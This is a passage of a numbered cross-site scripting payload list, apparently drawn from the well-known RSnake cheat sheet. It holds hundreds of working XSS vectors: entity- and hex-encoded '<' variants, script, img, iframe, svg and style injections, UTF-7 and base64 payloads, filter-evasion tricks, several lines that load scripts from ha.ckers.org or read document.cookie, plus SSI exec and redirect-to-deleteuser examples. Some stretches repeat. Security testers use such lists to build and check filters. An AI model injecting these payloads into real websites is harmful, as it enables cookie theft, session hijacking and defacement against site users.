  351. &lt;
  352. %3C
  353. &lt
  354. &lt;
  355. &LT
  356. &LT;
  357. &#60
  358. &#060
  359. &#0060
  360. &#00060
  361. &#000060
  362. &#0000060
  363. &lt;
  364. &#x3c
  365. &#x03c
  366. &#x003c
  367. &#x0003c
  368. &#x00003c
  369. &#x000003c
  370. &#x3c;
  371. &#x03c;
  372. &#x003c;
  373. &#x0003c;
  374. &#x00003c;
  375. &#x000003c;
  376. &#X3c
  377. &#X03c
  378. &#X003c
  379. &#X0003c
  380. &#X00003c
  381. &#X000003c
  382. &#X3c;
  383. &#X03c;
  384. &#X003c;
  385. &#X0003c;
  386. &#X00003c;
  387. &#X000003c;
  388. &#x3C
  389. &#x03C
  390. &#x003C
  391. &#x0003C
  392. &#x00003C
  393. &#x000003C
  394. &#x3C;
  395. &#x03C;
  396. &#x003C;
  397. &#x0003C;
  398. &#x00003C;
  399. &#x000003C;
  400. &#X3C
  401. &#X03C
  402. &#X003C
  403. &#X0003C
  404. &#X00003C
  405. &#X000003C
  406. &#X3C;
  407. &#X03C;
  408. &#X003C;
  409. &#X0003C;
  410. &#X00003C;
  411. &#X000003C;
  412. \x3c
  413. \x3C
  414. \u003c
  415. \u003C
  416. &lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;
  417. &lt;IMG SRC=\"javascript&#058;alert('XSS')\"
  418. &lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt;
  419. &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt;
  420. &lt;&lt;SCRIPT&gt;alert(\"XSS\");//&lt;&lt;/SCRIPT&gt;
  421. &lt;SCRIPT/SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  422. &lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\"XSS\")&gt;
  423. &lt;SCRIPT/XSS SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  424. &lt;IMG SRC=\" javascript&#058;alert('XSS');\"&gt;
  425. perl -e 'print \"&lt;SCR\0IPT&gt;alert(\\"XSS\\")&lt;/SCR\0IPT&gt;\";' &gt; out
  426. perl -e 'print \"&lt;IMG SRC=java\0script&#058;alert(\\"XSS\\")&gt;\";' &gt; out
  427. &lt;IMG SRC=\"jav&#x0D;ascript&#058;alert('XSS');\"&gt;
  428. &lt;IMG SRC=\"jav&#x0A;ascript&#058;alert('XSS');\"&gt;
  429. &lt;IMG SRC=\"jav&#x09;ascript&#058;alert('XSS');\"&gt;
  430. &lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;
  431. &lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;
  432. &lt;IMG SRC=javascript&#058;alert('XSS')&gt;
  433. &lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;
  434. &lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt;
  435. &lt;IMG SRC=`javascript&#058;alert(\"RSnake says, 'XSS'\")`&gt;
  436. &lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;
  437. &lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt;
  438. &lt;IMG SRC=javascript&#058;alert('XSS')&gt;
  439. &lt;IMG SRC=\"javascript&#058;alert('XSS');\"&gt;
  440. &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;
  441. '';!--\"&lt;XSS&gt;=&{()}
  442. ';alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,83))//\";alert(String&#46;fromCharCode(88,83,83))//\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt;
  443. ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  444. '';!--"<XSS>=&{()}
  445. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  446. <IMG SRC="javascript:alert('XSS');">
  447. <IMG SRC=javascript:alert('XSS')>
  448. <IMG SRC=javascrscriptipt:alert('XSS')>
  449. <IMG SRC=JaVaScRiPt:alert('XSS')>
  450. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  451. <IMG SRC=" &#14; javascript:alert('XSS');">
  452. <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  453. <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  454. <<SCRIPT>alert("XSS");//<</SCRIPT>
  455. <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
  456. \";alert('XSS');//
  457. </TITLE><SCRIPT>alert("XSS");</SCRIPT>
  458. ¼script¾alert(¢XSS¢)¼/script¾
  459. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  460. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  461. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
  462. <TABLE BACKGROUND="javascript:alert('XSS')">
  463. <TABLE><TD BACKGROUND="javascript:alert('XSS')">
  464. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  465. <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  466. <DIV STYLE="width: expression(alert('XSS'));">
  467. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  468. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  469. <XSS STYLE="xss:expression(alert('XSS'))">
  470. exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
  471. <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
  472. a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
  473. <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
  474. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>
  475. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  476. <form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION
  477. <form><button formaction="javascript:alert(123)">crosssitespt
  478. <frameset onload=alert(123)>
  479. <!--<img src="--><img src=x onerror=alert(123)//">
  480. <style><img src="</style><img src=x onerror=alert(123)//">
  481. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
  482. <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
  483. <embed src="javascript:alert(1)">
  484. <? foo="><script>alert(1)</script>">
  485. <! foo="><script>alert(1)</script>">
  486. </ foo="><script>alert(1)</script>">
  487. <script>({0:#0=alert/#0#/#0#(123)})</script>
  488. <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>
  489. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
  490. <script src="#">{alert(1)}</script>;1
  491. <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
  492. <svg xmlns="#"><script>alert(1)</script></svg>
  493. <svg onload="javascript:alert(123)" xmlns="#"></svg>
  494. <iframe xmlns="#" src="javascript:alert(1)"></iframe>
  495. +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
  496. %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
  497. +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
  498. %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
  499. %253cscript%253ealert(document.cookie)%253c/script%253e
  500. “><s”%2b”cript>alert(document.cookie)</script>
  501. “><ScRiPt>alert(document.cookie)</script>
  502. “><<script>alert(document.cookie);//<</script>
  503. foo<script>alert(document.cookie)</script>
  504. <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
  505. %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
  506. ‘; alert(document.cookie); var foo=’
  507. foo\’; alert(document.cookie);//’;
  508. </script><script >alert(document.cookie)</script>
  509. <img src=asdf onerror=alert(document.cookie)>
  510. <BODY ONLOAD=alert(’XSS’)>
  511. <script>alert(1)</script>
  512. "><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
  513. <video src=1 onerror=alert(1)>
  514. <audio src=1 onerror=alert(1)>
  515. <script>alert(123)</script>
  516. <script>alert("hellox worldss");</script>
  517. javascript:alert("hellox worldss")
  518. <img src="javascript:alert('XSS');">
  519. <img src=javascript:alert(&quot;XSS&quot;)>
  520. <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  521. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
  522. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  523. <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
  524. <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  525. <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  526. <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  527. <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  528. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  529. <<SCRIPT>alert("XSS");//<</SCRIPT>
  530. <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  531. ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
  532. <script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
  533. <script>alert("XSS");</script>&search=1
  534. 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
  535. <h1><font color=blue>hellox worldss</h1>
  536. <BODY ONLOAD=alert('hellox worldss')>
  537. <input onfocus=write(XSS) autofocus>
  538. <input onblur=write(XSS) autofocus><input autofocus>
  539. <body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  540. <form><button formaction="javascript:alert(XSS)">lol
  541. <!--<img src="--><img src=x onerror=alert(XSS)//">
  542. <![><img src="]><img src=x onerror=alert(XSS)//">
  543. <style><img src="</style><img src=x onerror=alert(XSS)//">
  544. <? foo="><script>alert(1)</script>">
  545. <! foo="><script>alert(1)</script>">
  546. </ foo="><script>alert(1)</script>">
  547. <? foo="><x foo='?><script>alert(1)</script>'>">
  548. <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
  549. <% foo><x foo="%><script>alert(123)</script>">
  550. <div style="font-family:'foo&#10;;color:red;';">LOL
  551. LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
  552. <script>({0:#0=alert/#0#/#0#(0)})</script>
  553. <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
  554. &lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;
  555. \\";alert('XSS');//
  556. &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt;
  557. &lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt;
  558. &lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
  559. &lt;BODY ONLOAD=alert('XSS')&gt;
  560. &lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt;
  561. &lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt;
  562. &lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt;
  563. &lt;BR SIZE=\"&{alert('XSS')}\"&gt;
  564. &lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt;
  565. &lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt;
  566. &lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt;
  567. &lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt;
  568. &lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt;
  569. &lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt;
  570. &lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt;
  571. &lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
  572. &lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt;
  573. &lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt;
  574. &lt;IMG SRC=\"livescript&#058;&#91;code&#93;\"&gt;
  575. žscriptualert(EXSSE)ž/scriptu
  576. &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert('XSS');\"&gt;
  577. &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt;
  578. &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\"
  579. &lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/IFRAME&gt;
  580. &lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/FRAMESET&gt;
  581. &lt;TABLE BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
  582. &lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
  583. &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
  584. &lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\"&gt;
  585. &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
  586. &lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt;
  587. &lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\"XSS\")';&lt;/STYLE&gt;
  588. &lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\"&gt;
  589. &lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&gt;
  590. exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\");
  591. xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&gt;
  592. &lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt;
  593. &lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
  594. &lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert('XSS')\")}&lt;/STYLE&gt;
  595. &lt;!--&#91;if gte IE 4&#93;&gt;
  596. &lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
  597. &lt;!&#91;endif&#93;--&gt;
  598. &lt;BASE HREF=\"javascript&#058;alert('XSS');//\"&gt;
  599. &lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/OBJECT&gt;
  600. &lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt;
  601. &lt;EMBED SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
  602. &lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
  603. a=\"get\";
  604. b=\"URL(\\"\";
  605. c=\"javascript&#058;\";
  606. d=\"alert('XSS');\\")\";
  607. eval(a+b+c+d);
  608. &lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt;
  609. &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\"&gt;&#93;&#93;&gt;
  610. &lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
  611. &lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
  612. &lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt;
  613. &lt;XML SRC=\"xsstest&#46;xml\" ID=I&gt;&lt;/XML&gt;
  614. &lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
  615. &lt;HTML&gt;&lt;BODY&gt;
  616. &lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\"&gt;
  617. &lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt;
  618. &lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt;
  619. &lt;/BODY&gt;&lt;/HTML&gt;
  620. &lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\"&gt;&lt;/SCRIPT&gt;
  621. &lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\"--&gt;
  622. &lt;? echo('&lt;SCR)';
  623. echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt;
  624. &lt;IMG SRC=\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\"&gt;
  625. Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser
  626. &lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt;
  627. &lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
  628. &lt;SCRIPT a=\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  629. &lt;SCRIPT =\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  630. &lt;SCRIPT a=\"&gt;\" '' SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  631. &lt;SCRIPT \"a='&gt;'\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  632. &lt;SCRIPT a=`&gt;` SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  633. &lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  634. &lt;SCRIPT&gt;document&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  635. &lt;A HREF=\"http&#58;//66&#46;102&#46;7&#46;147/\"&gt;XSS&lt;/A&gt;
  636. &lt;A HREF=\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt;
  637. &lt;A HREF=\"http&#58;//1113982867/\"&gt;XSS&lt;/A&gt;
  638. &lt;A HREF=\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\"&gt;XSS&lt;/A&gt;
  639. &lt;A HREF=\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\"&gt;XSS&lt;/A&gt;
  640. &lt;A HREF=\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\"&gt;XSS&lt;/A&gt;
  641. &lt;A HREF=\"//www&#46;google&#46;com/\"&gt;XSS&lt;/A&gt;
  642. &lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt;
  643. &lt;A HREF=\"http&#58;//ha&#46;ckers&#46;org@google\"&gt;XSS&lt;/A&gt;
  644. &lt;A HREF=\"http&#58;//google&#58;ha&#46;ckers&#46;org\"&gt;XSS&lt;/A&gt;
  645. &lt;A HREF=\"http&#58;//google&#46;com/\"&gt;XSS&lt;/A&gt;
  646. &lt;A HREF=\"http&#58;//www&#46;google&#46;com&#46;/\"&gt;XSS&lt;/A&gt;
  647. &lt;A HREF=\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt;
  648. &lt;A HREF=\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\"&gt;XSS&lt;/A&gt;
  649. &lt;
  650. %3C
  651. &lt
  652. &lt;
  653. &LT
  654. &LT;
  655. &#60
  656. &#060
  657. &#0060
  658. &#00060
  659. &#000060
  660. &#0000060
  661. &lt;
  662. &#x3c
  663. &#x03c
  664. &#x003c
  665. &#x0003c
  666. &#x00003c
  667. &#x000003c
  668. &#x3c;
  669. &#x03c;
  670. &#x003c;
  671. &#x0003c;
  672. &#x00003c;
  673. &#x000003c;
  674. &#X3c
  675. &#X03c
  676. &#X003c
  677. &#X0003c
  678. &#X00003c
  679. &#X000003c
  680. &#X3c;
  681. &#X03c;
  682. &#X003c;
  683. &#X0003c;
  684. &#X00003c;
  685. &#X000003c;
  686. &#x3C
  687. &#x03C
  688. &#x003C
  689. &#x0003C
  690. &#x00003C
  691. &#x000003C
  692. &#x3C;
  693. &#x03C;
  694. &#x003C;
  695. &#x0003C;
  696. &#x00003C;
  697. &#x000003C;
  698. &#X3C
  699. &#X03C
  700. &#X003C
  701. &#X0003C
  702. &#X00003C
  703. &#X000003C
  704. &#X3C;
  705. &#X03C;
  706. &#X003C;
  707. &#X0003C;
  708. &#X00003C;
  709. &#X000003C;
  710. \x3c
  711. \x3C
  712. \u003c
  713. \u003C
  714. &lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;
  715. &lt;IMG SRC=\"javascript&#058;alert('XSS')\"
  716. &lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt;
  717. &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt;
  718. &lt;&lt;SCRIPT&gt;alert(\"XSS\");//&lt;&lt;/SCRIPT&gt;
  719. &lt;SCRIPT/SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  720. &lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\"XSS\")&gt;
  721. &lt;SCRIPT/XSS SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
  722. &lt;IMG SRC=\" javascript&#058;alert('XSS');\"&gt;
  723. perl -e 'print \"&lt;SCR\0IPT&gt;alert(\\"XSS\\")&lt;/SCR\0IPT&gt;\";' &gt; out
  724. perl -e 'print \"&lt;IMG SRC=java\0script&#058;alert(\\"XSS\\")&gt;\";' &gt; out
  725. &lt;IMG SRC=\"jav&#x0D;ascript&#058;alert('XSS');\"&gt;
  726. &lt;IMG SRC=\"jav&#x0A;ascript&#058;alert('XSS');\"&gt;
  727. &lt;IMG SRC=\"jav&#x09;ascript&#058;alert('XSS');\"&gt;
  728. &lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;
  729. &lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;
  730. &lt;IMG SRC=javascript&#058;alert('XSS')&gt;
  731. &lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;
  732. &lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt;
  733. &lt;IMG SRC=`javascript&#058;alert(\"RSnake says, 'XSS'\")`&gt;
  734. &lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;
  735. &lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt;
  736. &lt;IMG SRC=javascript&#058;alert('XSS')&gt;
  737. &lt;IMG SRC=\"javascript&#058;alert('XSS');\"&gt;
  738. &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;
  739. '';!--\"&lt;XSS&gt;=&{()}
